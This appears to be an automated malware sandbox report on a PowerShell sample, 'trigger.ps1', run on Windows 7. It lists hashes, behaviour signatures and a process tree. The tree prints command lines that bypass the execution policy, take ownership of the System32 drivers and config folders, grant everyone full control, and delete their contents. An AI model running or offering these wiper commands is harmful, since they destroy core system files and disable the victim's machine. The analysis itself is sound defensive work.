Analysis
max time kernel: 16s
max time network: 19s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 13-08-2024 20:55
Static task: static1
Behavioral task: behavioral1
Sample: trigger.ps1
Resource: win7-20240705-en
General
Target: trigger.ps1
Size: 1KB
MD5: 84cb1e2083b8106b83a45c6aa00dd55d
SHA1: e12ea5b7deb81774acb89088dc1f2dce755782e9
SHA256: 735116a2700250eb6865f98ebef5519c9de350fde9fc5bb0a3b3c18a63486c78
SHA512: 4b01e6fcd0776596cf39de15cf7b8777f508246c6fb0f0023067db9116d364bd4693b71d9273c942c9357f18a2a631ec698b7e0a00d3f239da90df0b882e5e3a
Malware Config
Signatures

Possible privilege escalation attempt (4 IoCs)
Processes:
  pid   process
  2652  takeown.exe
  2596  icacls.exe
  2740  takeown.exe
  2552  icacls.exe
Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  pid   process
  2652  takeown.exe
  2596  icacls.exe
  2740  takeown.exe
  2552  icacls.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                                 process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid   process
  1544  powershell.exe
  3048  chrome.exe
  3048  chrome.exe
Suspicious use of AdjustPrivilegeToken (18 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          1544  powershell.exe
  Token: SeTakeOwnershipPrivilege  2652  takeown.exe
  Token: SeShutdownPrivilege       3048  chrome.exe  (16 identical entries)
Suspicious use of FindShellTrayWindow (51 IoCs)
Processes:
  pid   process
  3048  chrome.exe  (51 identical entries)
Suspicious use of SendNotifyMessage (48 IoCs)
Processes:
  pid   process
  3048  chrome.exe  (48 identical entries)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  description         pid   process         target pid  target process
  wrote to memory of  1544  powershell.exe  2556        csc.exe      (3 entries)
  wrote to memory of  2556  csc.exe         2772        cvtres.exe   (3 entries)
  wrote to memory of  1544  powershell.exe  2104        cmd.exe      (3 entries)
  wrote to memory of  2104  cmd.exe         2652        takeown.exe  (3 entries)
  wrote to memory of  2104  cmd.exe         2596        icacls.exe   (3 entries)
  wrote to memory of  1544  powershell.exe  1704        cmd.exe      (3 entries)
  wrote to memory of  1704  cmd.exe         2740        takeown.exe  (3 entries)
  wrote to memory of  1704  cmd.exe         2552        icacls.exe   (3 entries)
  wrote to memory of  3048  chrome.exe      2388        chrome.exe   (3 entries)
  wrote to memory of  3048  chrome.exe      2536        chrome.exe   (all remaining entries)
Processes
(Bracketed number is the depth in the process tree; child processes are indented under their parent.)

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1544)
    Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  (PID 2556)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ptkhlbfa.cmdline"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe  (PID 2772)
        Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE947.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE946.tmp"

  [2] C:\Windows\system32\cmd.exe  (PID 2104)
      Command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\takeown.exe  (PID 2652)
        Command line: takeown /f C:\Windows\System32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\icacls.exe  (PID 2596)
        Command line: icacls C:\Windows\System32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions

  [2] C:\Windows\system32\cmd.exe  (PID 1704)
      Command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\takeown.exe  (PID 2740)
        Command line: takeown /f C:\Windows\System32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions

    [3] C:\Windows\system32\icacls.exe  (PID 2552)
        Command line: icacls C:\Windows\System32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions

[1] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3048)
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2388)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1c39758,0x7fef1c39768,0x7fef1c39778

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2536)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:2

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2144)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1368 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1240)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2952)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2088 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1684)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2096 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1304)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1576 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:2

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1080)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2824 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2480)
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3612 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:8

[1] C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe  (PID 332)
    Command line: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
Network
MITRE ATT&CK Enterprise v15
Downloads